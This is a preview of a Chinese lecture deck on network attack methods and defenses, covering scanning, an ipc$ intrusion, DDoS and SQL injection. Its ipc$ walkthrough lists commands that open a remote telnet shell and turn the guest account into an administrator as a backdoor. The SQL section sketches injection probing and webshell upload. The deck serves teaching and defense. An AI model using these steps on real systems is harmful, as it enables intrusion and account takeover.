预览加载中,请您耐心等待几秒...
1/10
2/10
3/10
4/10
5/10
6/10
7/10
8/10
9/10
10/10

亲,该文档总共43页,到这已经超出免费预览范围,如果喜欢就直接下载吧~

如果您无法下载资料,请参考说明:

1、部分资料下载需要金币,请确保您的账户上有足够的金币

2、已购买过的文档,再次下载不重复扣费

3、资料包下载后请先用软件解压,在使用对应软件打开

网络攻击的常见手段与防范措施01什么是网络安全?网络安全的主要特性01黑客KevinMitnick莫里斯蠕虫(MorrisWorm)2001年中美黑客大战PoizonB0x、pr0phet更改的网页国内黑客组织更改的网站页面这次事件中采用的常用攻击手法这次事件中被利用的典型漏洞01常见的攻击方法端口 判断IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。.获取网络服务的端口作为入侵通道。3、系统漏洞利用 一次利用ipc$的入侵过程6.C:\>telnetx.x.x.x99这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copyntlm.exe\\127.0.0.1\admin$ntlm.exe也在《流光》的Tools目录中 8.C:\WINNT\system32>ntlm输入ntlm启动(这里的C:\WINNT\system32>是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“netstarttelnet”来开启Telnet服务) 9.Telnetx.x.x.x,接着输入用户名与密码就进入对方了 10.C:\>netuserguest/active:yes为了方便日后登陆,将guest激活并加到管理组 11.C:\>netuserguest1234将Guest的密码改为1234 12.C:\>netlocalgroupadministratorsguest/add将Guest变为Administrator01北京时间10月22日凌晨,美国域名服务器管理服务供应商Dyn宣布,该公司在当地时间周五早上遭遇了DDoS(分布式拒绝服务)攻击,从而导致许多网站在美国东海岸地区宕机,Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。Dyn称,攻击由感染恶意代码的设备发起,来自全球上千万IP地址,几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。 攻击现象 被攻击主机上有大量等待的TCP连接; 网络中充斥着大量的无用的数据包; 源地址为假制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯; 利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求,使主机无法处理所有正常请求; 严重时会造成系统死机。分布式拒绝服务攻击主机设置 所有的主机平台都有抵御DoS的设置,基本的有: 1、关闭不必要的服务 2、限制同时打开的Syn半连接数目 3、缩短Syn半连接的timeout时间 4、及时更新系统补丁 网络设置 1.防火墙 禁止对主机的非开放服务的访问限制同时打开的SYN最大连接数限制特定IP地址的访问启用防火墙的防DDoS的属性严格限制对外开放的服务器的向外访问第五项主要是防止自己的服务器被当做工具去害人。 2.路由器 设置SYN数据包流量速率升级版本过低的ISO为路由器建立logserver雅虎作为美国著名的互联网门户网站,也是20世纪末互联网奇迹的创造者之一。然而在2013年8月20日,中国雅虎邮箱宣布停止提供服务。就在大家已快将其淡忘的时候,雅虎公司突然对外发布消息,承认在2014年的一次黑客袭击中,至少5亿用户的数据信息遭窃。此次事件成为了有史以来规模最大的单一网站信息泄露事件。攻击方法 SQL注入主要是由于网页制作者对输入数据检查不严格,攻击者通过对输入数据的改编来实现对数据库的访问,从而猜测出管理员账号和密码; 如http://a.com/view.asp?id=1; 改为http://a.com/view.asp?id=1anduser=‘admin’; 如果页面显示正常,说明数据库表中有一个user字段,且其中有admin这个值; 通过SQL注入攻击可以探测网站后台管理员账号和密码。 利用探测出的管理员账号和密码登陆网站后台,在拥有附件上传的功能模块中尝试上传网页木马或一句话木马(一般利用数据库备份和恢复功能); 通过网页木马探测IIS服务器配置漏洞,找到突破点提升权限,上传文件木马并在远程服务器上运行; 通过连接木马彻底拿到系统控制权; 因此,SQL注入只是网站入侵的前奏,就算注入成功也不一定可以拿到webshell或root。 1、输入验证 检查用户输入的合法性,确信输入的内容只包含合法的数据。 2、错误消息处理 防范SQL注入,还要避免出现一些详细的错误消息,因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证